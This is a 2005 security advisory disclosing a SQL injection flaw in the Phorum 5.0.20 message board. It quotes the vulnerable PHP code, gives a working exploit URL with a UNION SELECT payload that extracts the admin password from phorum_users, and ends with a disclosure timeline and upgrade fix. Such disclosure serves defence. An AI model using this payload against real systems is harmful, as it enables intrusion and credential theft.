[waraxe-2005-SA#043] - Sql injection in Phorum 5.0.20 and earlier
{================================================================================}
{ [waraxe-2005-SA#043]
}
{================================================================================}
{
}
{ [ Sql injection in Phorum 5.0.20 and earlier ]
}
{
}
{================================================================================}
Author: Janek Vind "waraxe"
Date: 04. November 2005
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-43.html
Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Phorum 5.0.20
Homepage: http://phorum.org/
What is Phorum?
Phorum is a web based message board written in PHP.
Phorum is designed with high-availability and visitor ease
of use in mind. Features such as mailing list integration,
easy customization and simple installation make Phorum a
powerful add-in to any website.
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Critical sql injection has been found in Phorum 5.0.0.alpha
to 5.0.20. Phorum 5.1.x branch (in alpha stage) seems to be unaffected.
Details
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Problem lies in uninitialized array "$forum_ids" in "search.php" file.
>From source code:
----------------[ from source code ]------------------
$forum_ids[$row["forum_id"]] = $row["forum_id"];
$match_number++;
}
$forums = phorum_db_get_forums($forum_ids);
foreach($arr["rows"] as $key => $row){
$arr["rows"][$key]["forum_url"] =
phorum_get_url(PHORUM_LIST_URL, $row["forum_id"]);
$arr["rows"][$key]["forum_name"] =
$forums[$row["forum_id"]]["name"];
}
----------------[ /from source code ]-----------------
This can give as possibilities to "inject" arbitrary data to "$forum_ids"
array by GPC and next let's look at "phorum_db_get_forums()" function from
"include/db/mysql.php" :
----------------[ from source code ]------------------
if (is_array($forum_ids)) $forum_ids = implode(",", $forum_ids);
$sql = "select * from {$PHORUM['forums_table']} ";
if ($forum_ids){
$sql .= " where forum_id in ($forum_ids)";
} elseif (func_num_args() > 1) {
$sql .= " where parent_id = $parent_id";
if(!defined("PHORUM_ADMIN")) $sql.=" and active=1";
}
$sql .= " order by display_order ASC, name";
$res = mysql_query($sql, $conn);
if ($err = mysql_error()) phorum_db_mysql_error("$err: $sql");
----------------[ /from source code ]-----------------
So sql query manipulation seems to be possible. Now let's try this
in real world ...
[------ real life exploit ------]
http://localhost/phorum520/search.php?1,search=a,page=1,match_type=ALL,
match_dates=30,match_forum=ALL,body=1,author=1,subject=1,&forum_ids[]=-99)
/**/UNION/**/ALL/**/SELECT/**/1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,21,32/**/FROM/**/phorum_users
/**/WHERE/**/admin=1/**/LIMIT/**/1/*
There are some critical conditions for exploit to be successful.
1. "register_globals" must be "on", so we can poison php variable space
through GPC.
2. "search=a" - this search string must return one or more results.
3. "SELECT/**/1,password" - first number in sql injection, in our case "1",
must be "forum_id" for forum in search results.
4. sql table prefix "phorum_" can be different, but this will give nice sql
error
messages and reveal real prefix.
5. Some Phorum versions seems to have different table structure for
"phorum_users",
so again, there will be sql error messages. It's easy to overcome this kind of
problem by altering sql injection string as "trial/error".
[----- /real life exploit ------]
See ya and have a nice day ;)
Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
01. november 2005 - vendor first contacted
01. november 2005 - vendor response
02. november 2005 - details emailed to vendor
03. november 2005 - vendor released new, patched version
04. november 2005 - public advisory released
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Download new Phorum version 5.0.21 from:
http://phorum.org/downloads/phorum-5.0.21.tar.gz
More info: http://phorum.org/story.php?57
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to LINUX, Heintz, murdock, g0df4th3r, slimjim100, shai-tan,
y3dips and all other active members from waraxe community !
Tervitused - Raido Kerna !
Additional resources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DX expedition database - http://www.dxdb.com/
Hard disc recovery - http://www.hdd911.com/
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@xxxxxxxxx
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------